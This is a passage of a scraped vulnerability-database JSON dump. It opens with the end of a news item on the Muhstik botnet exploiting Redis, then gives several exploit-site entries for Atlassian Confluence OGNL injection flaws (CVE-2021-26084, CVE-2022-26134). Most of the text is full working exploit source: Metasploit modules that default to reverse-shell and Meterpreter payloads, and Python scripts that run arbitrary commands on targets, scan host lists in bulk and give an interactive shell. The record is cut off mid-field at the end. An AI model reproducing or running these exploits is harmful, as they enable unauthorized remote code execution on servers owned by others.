Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2022-06-09T08:00:58", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. 
A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = 
send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? 
\"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:00:13", "description": "Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Confluence OGNL Injection Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37778", "href": "https://0day.today/exploit/description/37778", "sourceData": "#!/usr/bin/python3\n\n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: 
https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] 
Stopping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. 
http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-20T02:28:51", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "zdt", "title": "Confluence Data Center 7.18.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "1337DAY-ID-37783", "href": "https://0day.today/exploit/description/37783", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Exploit Author: 
h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] 
Stopping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. 
http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37783", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T11:22:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 
'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # 
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 
Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": 